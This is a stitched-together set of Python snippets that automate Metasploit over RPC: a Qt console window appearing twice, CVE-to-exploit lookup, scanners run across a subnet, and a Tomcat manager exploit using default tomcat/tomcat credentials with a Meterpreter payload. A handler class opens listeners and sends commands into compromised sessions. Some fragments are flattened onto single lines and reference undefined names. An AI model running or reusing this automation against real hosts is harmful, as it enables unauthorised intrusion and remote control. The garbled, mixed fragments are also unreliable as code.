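class MsfShellWindow(QMainWindow, Ui_MainWindow):
    """Qt main window that presents an ``MsfRpcConsole`` as an interactive shell.

    Text entered in ``commanderLineEdit`` is sent to the console with
    ``execute``; data handed to the ``cb`` callback is appended to
    ``outputTextBrowser`` together with the current prompt.
    """

    def __init__(self, msfrpc, **kwargs):
        """Build the widgets, wire the command line and attach the console.

        Args:
            msfrpc: client object passed through to ``MsfRpcConsole``.
            **kwargs: optional ``parent`` (Qt parent, removed before the rest
                is forwarded), ``sessionid`` and ``command`` (see ``_msfInit``).
        """
        QMainWindow.__init__(self, kwargs.pop('parent', None))
        self.setupUi(self)
        self.setWindowTitle('Metasploit Console')
        self._initCommandLine()
        self._msfInit(msfrpc, **kwargs)

    @staticmethod
    def _escapeHtml(text):
        """Return *text* with ``&``, ``<`` and ``>`` replaced by HTML entities."""
        return text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')

    def _msfInit(self, msfrpc, **kwargs):
        """Create the console and, if ``command`` was given, submit it at once."""
        self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
        self.prompt = 'msf >'
        self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'), cb=self._emitSignal)
        if 'command' in kwargs:
            # Simulate the user typing the command and pressing Return.
            self.commanderLineEdit.setText(kwargs['command'])
            self.commanderLineEdit.emit(SIGNAL('returnPressed()'))

    def _emitSignal(self, d):
        """Console callback: forward *d* to the GUI as a ``repr`` string.

        The signal carries a QString, so the value is serialised with
        ``repr`` here and parsed back in ``_getOutput``.
        """
        self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))

    def _initCommandLine(self):
        """Connect Return in the command line and cache the output scroll bar."""
        self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand)
        self.vb = self.outputTextBrowser.verticalScrollBar()

    def _sendCommand(self):
        """Send the typed command to the console and echo it in the output pane.

        Typing ``exit`` closes the window instead of being sent.
        """
        c = self.outputTextBrowser.textCursor()
        c.movePosition(QTextCursor.End)
        self.outputTextBrowser.setTextCursor(c)
        cmd = str(self.commanderLineEdit.text())
        if cmd == 'exit':
            self.close()
            return
        self.c.execute(cmd)
        # Escape the echo so typed markup is displayed literally, not rendered.
        self.outputTextBrowser.insertHtml('%s<br>' % self._escapeHtml(cmd))
        self.commanderLineEdit.clear()
        self.vb.setValue(self.vb.maximum())

    def _getOutput(self, d):
        """Slot for console output: show the data and the new prompt.

        *d* is the ``repr`` string produced by ``_emitSignal``; it is read
        for its ``prompt`` and ``data`` keys.
        """
        import ast

        # The string is built from console output, which can contain text
        # that originated on a remote host. literal_eval only accepts Python
        # literals, so it parses the repr() without executing anything,
        # unlike the eval() used before.
        d = ast.literal_eval(str(d))
        self.prompt = d['prompt']
        self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
        # The prompt is placed inside markup, so escape it first.
        self.outputTextBrowser.insertHtml(
            '<font color="red"><b>%s</b></font><font color="black"> </font>'
            % self._escapeHtml('%s' % self.prompt))
        self.vb.setValue(self.vb.maximum())

    def closeEvent(self, event):
        """Run the console object's ``__del__`` explicitly, then close the window.

        What ``__del__`` releases is defined by ``MsfRpcConsole``, which is
        not part of this listing.
        """
        self.c.__del__()
        QMainWindow.close(self)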
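class MsfShellWindow(QMainWindow, Ui_MainWindow):
    """Main window exposing an ``MsfRpcConsole`` through a Qt command line.

    Commands from ``commanderLineEdit`` go to the console via ``execute``;
    whatever the console passes to its ``cb`` callback is written to
    ``outputTextBrowser`` followed by the prompt.
    """

    def __init__(self, msfrpc, **kwargs):
        """Set up the UI and the console.

        Args:
            msfrpc: client object given to ``MsfRpcConsole``.
            **kwargs: ``parent`` is popped and used as the Qt parent; the
                remaining keys (``sessionid``, ``command``) are read by
                ``_msfInit``.
        """
        QMainWindow.__init__(self, kwargs.pop('parent', None))
        self.setupUi(self)
        self.setWindowTitle('Metasploit Console')
        self._initCommandLine()
        self._msfInit(msfrpc, **kwargs)

    @staticmethod
    def _escapeHtml(text):
        """Replace ``&``, ``<`` and ``>`` in *text* with their HTML entities."""
        return text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')

    def _msfInit(self, msfrpc, **kwargs):
        """Attach the console; run ``kwargs['command']`` first when present."""
        self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
        self.prompt = 'msf >'
        self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'), cb=self._emitSignal)
        if 'command' in kwargs:
            # Same path as a user entering the command and pressing Return.
            self.commanderLineEdit.setText(kwargs['command'])
            self.commanderLineEdit.emit(SIGNAL('returnPressed()'))

    def _emitSignal(self, d):
        """Console callback: pass *d* to the output slot as ``repr(d)``."""
        self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))

    def _initCommandLine(self):
        """Hook up the Return key and keep a handle on the output scroll bar."""
        self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand)
        self.vb = self.outputTextBrowser.verticalScrollBar()

    def _sendCommand(self):
        """Execute the typed command on the console and echo it; ``exit`` closes."""
        c = self.outputTextBrowser.textCursor()
        c.movePosition(QTextCursor.End)
        self.outputTextBrowser.setTextCursor(c)
        cmd = str(self.commanderLineEdit.text())
        if cmd == 'exit':
            self.close()
            return
        self.c.execute(cmd)
        # insertHtml renders markup; escape so the echo shows what was typed.
        self.outputTextBrowser.insertHtml('%s<br>' % self._escapeHtml(cmd))
        self.commanderLineEdit.clear()
        self.vb.setValue(self.vb.maximum())

    def _getOutput(self, d):
        """Output slot: parse the ``repr`` string and display data and prompt."""
        import ast

        # eval() on this string would run any expression embedded in it, and
        # the string is derived from console output. literal_eval restricts
        # parsing to literals, which is all repr() of the callback data needs.
        d = ast.literal_eval(str(d))
        self.prompt = d['prompt']
        self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
        # Prompt text goes into an HTML fragment, so it is escaped first.
        self.outputTextBrowser.insertHtml(
            '<font color="red"><b>%s</b></font><font color="black"> </font>'
            % self._escapeHtml('%s' % self.prompt))
        self.vb.setValue(self.vb.maximum())

    def closeEvent(self, event):
        """Invoke the console's ``__del__`` directly, then close the window."""
        self.c.__del__()
        QMainWindow.close(self)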
client = MsfRpcClient("hocine") console = MsfRpcConsole(client, cb=console_reader) #utile.parcer_result_scannig("result_of_scannig.csv") list_cve = [] list_host_exploit = [] list_temp = list() hitgh_vul = open("high_vul.csv", "r") lines = csv.reader(hitgh_vul) for line in lines: list_cve = line[1].split(',') line[1] = "" for cve in list_cve: console.execute("search " + str(cve) + "") time.sleep(5) while status_of_console: time.sleep(2) list_temp.append(line[0]) list_temp.append(str(line_with_exploit).split()[2]) print list_temp line_with_exploit = [] list_host_exploit.append(list_temp) list_temp = [] print list_temp hitgh_vul.close() print list_host_exploit for target in list_host_exploit:
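from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole

# Connect to the Metasploit RPC service.
# NOTE(review): the RPC password is a literal in the source (the user name is
# masked in this excerpt); anyone who can read the file can drive the RPC
# service, so the secret belongs in the environment or a secret store.
client = MsfRpcClient('123456', user='******')

# Print the name of every auxiliary module the server reports.
auxilary = client.modules.auxiliary
for i in auxilary:
    print("\t%s" % i)

# Module-object variant: configure the SSH version scanner and run it.
scan = client.modules.use('auxiliary', 'scanner/ssh/ssh_version')
# The next two expressions discard their values; they look like leftovers
# from an interactive session and are kept unchanged.
scan.description
scan.required
scan['VERBOSE'] = True
scan['RHOSTS'] = '192.168.1.119'
print(scan.execute())

# Console variant of the same run, issued as console commands.
console = MsfRpcConsole(client)
# `console` is first bound on the line above. The excerpt originally printed
# dir(console) before creating the client's console, which raises NameError,
# so the inspection now happens here.
print(dir(console))
console.execute('use scanner/ssh/ssh_version')
console.execute('set RHOSTS 192.168.1.119')
console.execute('set VERBOSE True')
console.execute('run')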
# Excerpt: `client` is created outside the lines shown here.

# Print the name of every exploit module the server reports.
exploits = client.modules.exploits
for exploit in exploits:
    print("\t%s" % exploit)

# Module-object variant: select the module and set its options.
scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')
# The next two expressions discard their values (no effect visible here).
scan.description
scan.required
scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
# Credentials are masked in this excerpt.
scan['HttpUsername'] = '******'
scan['HttpPassword'] = '******'
scan['payload'] = 'java/meterpreter/bind_tcp'
print(scan.execute())

# Console variant: the same settings issued as console commands.
console = MsfRpcConsole(client)
console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
# NOTE(review): here the manager credentials are tomcat/tomcat, i.e. the run
# depends on a manager application at /manager that accepts a sample or
# default account. On the defending side, removing such accounts and
# restricting who can reach /manager closes that exposure.
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')
global global_console_status global_console_status = console_data['busy'] if '[+]' in console_data['data']: sigdata = console_data['data'].rstrip().split('\n') for line in sigdata: if '[+]' in line: global_positive_out.append(line) client = MsfRpcClient('password') # cb - callback function, executes when data arrives to console console = MsfRpcConsole(client, cb=read_console) time.sleep(10) console.execute('use auxiliary/scanner/ftp/ftp_version') console.execute('set RHOSTS 192.168.0.0/24') console.execute('set THREADS 20') console.execute('run') time.sleep(5) while global_console_status: print 'global_console_status: ' + str(global_console_status) time.sleep(5) time.sleep(5) targets = list() for line in global_positive_out: if 'FreeFloat' in line: ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', line)[0] targets.append(ip)
class MetasploitInteractor():
    """Wrap one Metasploit RPC client together with a background handler console.

    The constructor connects to the RPC service, opens a console whose output
    is collected in ``consolebuffer`` and starts ``exploit/multi/handler`` as
    a job. The remaining methods relay console text and session commands.
    """

    def __init__(self, password, rpcport, listenerport, payload):
        """Connect to the RPC service and start the handler job.

        Args:
            password: RPC password passed to ``MsfRpcClient``.
            rpcport: port of the RPC service.
            listenerport: value used for the handler's ``LPORT``.
            payload: value used for the handler's ``PAYLOAD``.
        """
        # NOTE(review): ssl=False is passed explicitly; assuming it switches
        # off TLS as the name suggests, the password and all RPC traffic
        # travel unencrypted, so keep the service on loopback or enable TLS.
        self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)
        # The buffer exists before the console so the callback can use it.
        self.consolebuffer = []
        self.listenerconsole = MsfRpcConsole(
            self.interactorclient, cb=self.appendtoconsolebuffer)
        send = self.listenerconsole.execute
        send('use exploit/multi/handler')
        send('set PAYLOAD ' + payload)
        send('set LPORT ' + str(listenerport))
        # NOTE(review): 0.0.0.0 makes the handler listen on every interface.
        send('set LHOST 0.0.0.0')
        send('set ExitOnSession false')
        send('exploit -j')
        self.currentsessionid = None
        self.currentshell = None

    def writetoconsole(self, data):
        """Send *data* to the handler console as a command."""
        self.listenerconsole.execute(data)

    def appendtoconsolebuffer(self, consoledata):
        """Console callback: queue *consoledata* until ``readconsole`` is called."""
        self.consolebuffer.append(consoledata)

    def readconsole(self):
        """Return everything queued so far and start a fresh, empty buffer."""
        pending, self.consolebuffer = self.consolebuffer, []
        return pending

    def getsessions(self, verbose=False):
        """List the sessions known to the RPC client.

        Returns the raw ``items()`` of the session mapping when *verbose* is
        true, otherwise a list of ``[sessionid, info, username]`` rows.
        """
        session_items = self.interactorclient.sessions.list.items()
        if verbose:
            return session_items
        rows = []
        for sid, meta in session_items:
            rows.append([sid, meta['info'], meta['username']])
        return rows

    def sendcommandtosession(self, sessionid, command):
        """Write *command* to a session and return what it reads back.

        The session object is cached and only looked up again when
        *sessionid* differs from the previous call. Failures are reported as
        the strings "Error, session does not exist" and "Error, session died".
        """
        switching = sessionid != self.currentsessionid
        if switching:
            try:
                self.currentshell = self.interactorclient.sessions.session(
                    sessionid)
            except KeyError:
                return "Error, session does not exist"
            # Record the id only after the lookup succeeded.
            self.currentsessionid = sessionid
        try:
            self.currentshell.write(command)
            reply = self.currentshell.read()
        except (metasploit.msfrpc.MsfRpcError, httplib.CannotSendRequest):
            return "Error, session died"
        return reply